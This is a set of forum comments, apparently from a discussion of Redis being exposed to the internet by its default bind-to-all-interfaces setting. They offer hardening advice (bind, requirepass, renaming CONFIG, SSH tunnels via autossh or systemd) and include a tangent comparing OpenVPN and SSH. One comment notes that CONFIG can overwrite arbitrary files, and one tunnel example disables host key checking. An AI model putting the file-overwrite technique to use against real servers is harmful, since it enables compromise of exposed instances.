As is, Redis should probably default to only using the UNIX socket (where filesystem permissions apply), with TCP-enabling configuration options having impossible-to-miss warnings in example configs and documentation.
In the blog post there's this part, castigating inattentive users about falling pray to this fail-open nature of Redis:
"The problem is that, whatever we state in our security page, there are a lot of Redis instances exposed to the internet unintentionally. Not because the use case requires outside clients to access Redis, but because nobody bothered to protect a given Redis instance from outside accesses via fire walling"
Sounds like the author should really have another hard think about this stance.
"By default Redis listens for connections from all the network interfaces available on the server."
In my case the reason Redis ended up exposed to the Internet was another dev "updated the configuration" to the default provided by the package. Okay, perhaps that was the wrong thing to do, but it simply shouldn't be that easy to expose an vulnerable service to the Internet! I understand that people should run firewalls too but a belt and braces approach should really be taken here.
PS. While I'm moaning, Jenkins is another big offender in this respect. I can't be the only person to have tried side-step its own security by having it only bind to localhost and using SSH tunnelling only to find something which can execute arbitrary code is exposed to the public Internet when the configuration is switched back to its default. Yes, a firewall would fix it, but as far as I'm concerned, Jenkins shares some of the blame for being insecure by default in the absence of one.
Back in the day, daemons (especially IRCds) would have a 'comment me to enable' line arbitrarily inserted into the generated conf file which would prevent the daemon from starting up entirely. You'd spend 10 minutes reading through the config files rather than just presuming it was configured the way you want. The belts and brace approach should be that. Stupid users won't be able to just 'gem install <foo>' or 'apt-get install <bar>' then complain so often that an engineer who has contributed so much to the community (remember Antirez was doing this for ages, as a father, operating the entire project by himself (support and all), for multiple years before he finally was able to work on it full time) has to take time out of his day to justify "hey guys, you're sort of responsible for the way you configure your daemons".
Can you please go beyond vague references like "tons of things behind the scenes" and "certainly been evaluated". What's the direct answer to the question: "Why can't it just listen on loopback by default?"
I'm not sure "stupid users" and "clever Antirez" gets us any further towards a proper answer here.
Whoever decides to use it should do their homework and _understand_ what they are installing.
This does not mean Redis can't harden the defaults and the documentation, but is also not a fault of Redis that people are too lazy to really understand what a software stack is doing.
autossh -M 0 -N -L 6379:localhost:6379 -o "ServerAliveInterval 60" \
-o "ServerAliveCountMax 3" -o "StrictHostKeyChecking=no" -o "BatchMode=yes" \
-i /home/tunnel/.ssh/id_rsa firstname.lastname@example.org
Edit: Should add autossh automatically reconnects the tunnel if the connection fails. Vanilla ssh does not.
(One of the other things you should strongly consider, if you care about HIPAA compliance, is using either full-disk encryption or encryping the directory where Redis' data file resides. We do this with encryptfs. We also encryptfs the Tarsnap cache directory, which holds recoverable cleartext. Tarsnap archives are encrypted automatically without requiring further work.)
There also exist another dozen or so box-ticking requirements with regards to procedures and documentation, but those are the main rubber-hits-the-hard-disk things you have to do with respect to using Redis for PHI.
Its been ages since I played around with networking at a low-level (we're talking teenage years, when ARIN didn't charge for netblocks, and Cisco 7206VXR's could hold the entire internet BGP table in it), but I'll give it a go.
1) It's not a fair comparison to begin with since OpenVPN is effectively maintaining a lot more information as it's acting as either a) as is in his configuration, a Layer 3 router, there's bound to be more overhead as it's maintaining a lot more information than a single Point-to-Point SSH connection; he should be using Bridged Mode and routing via a virtual switch at L2 instead. He sort of acknowledged this by making an appeal to the OSI layer, but then didn't check to see if there was a way to disable the full-routing functionality and move down to switching.
As he himself said, he's using this simply to tunnel peer-to-peer, so if he configures his subnet as a /30 on OpenVPN, defined static routes, and read this guide  he'd see that an MTU at ~6000 is recommended (jumbo frames indeed!). Starting with a similar config as his (using iperf), the OpenVPN guys went from ~125Mbps to ~500 mbps.
That was without kernel tuning, just parameter changing.
2) I haven't tested this, but if you read the comments within the thread (especially from those made by kasperd his networking device is misconfigured at the kernel level (for his purposes), leading to tons of fragmentation that can be rectified [see: the MTU/MSS discussion in the OP's "Read more comments"]. edit: Yep I was right. Check cite .
I'm sure someone who's actually in networking can address this further but this is not only apples-to-oranges but rotten-apples*-to-oranges. (where rotten-apples == a very poorly configured set of OpenVPN instances).
Also, FWIW, I use systemd service for an ssh tunnel instead of autossh. Works brilliantly.
Description=SSH remote forwarding to here
ExecStart=/bin/ssh -v -N -o PasswordAuthentication=no -o "ServerAliveInterval 60" -o "ServerAliveCountMax 3" -R 2222:localhost:22 -o TCPKeepAlive=yes -p 222 -i /home/autossh/.ssh/autossh email@example.com
Generally speaking I think way to many services assume that they're allow to roam the filesystem freely, when chrooting should be "the bare minimum" one could expect.
Like having port 6379 be open to anyone who happens to wander by? Your firewall was horribly configured and you got burned, take this as a learning opportunity to fix your mistakes.
> ... that they don't even MENTION the security
> concerns from the quickstart guide>
Like the 'Securing Redis' section from that link?
By default Redis binds to all the interfaces and has no authentication at all. ...
1) Make sure the port Redis uses to listen for connections is firewalled...
2) Use a configuration file where the bind directive is set ... [to] as little network interfaces you are using...
3) Use the requirepass option ...
4) Use spiped or another SSL tunnelling software...
# Command renaming.
# It is possible to change the name of dangerous commands in a shared
# For instance the CONFIG command may be renamed into something
# hard to guess so that it will still be available for internal-use tools
# but not available for general clients.
# rename-command CONFIG b840fc02d524045429941cc15f59e41cb7be6c52
# It is also possible to completely kill a command by renaming it into
# an empty string:
# rename-command CONFIG ""
I'm a big Redis fan, and have used most of its power, including the great HyperLogLog stuff, I never really looked at the CONFIG command and would not have imagined it would allow such things even.
Is CONFIG commonly used? What are the use cases?
> This is perfectly fine if you are starting Redis just to play a bit with it or for development, but for production environments you should use a configuration file.
Not to mention you can over-write arbitrary files by setting the dbfilename and config directory (Not sure why this is an interactive option to start with?).
They didnt even bother changing the keyname.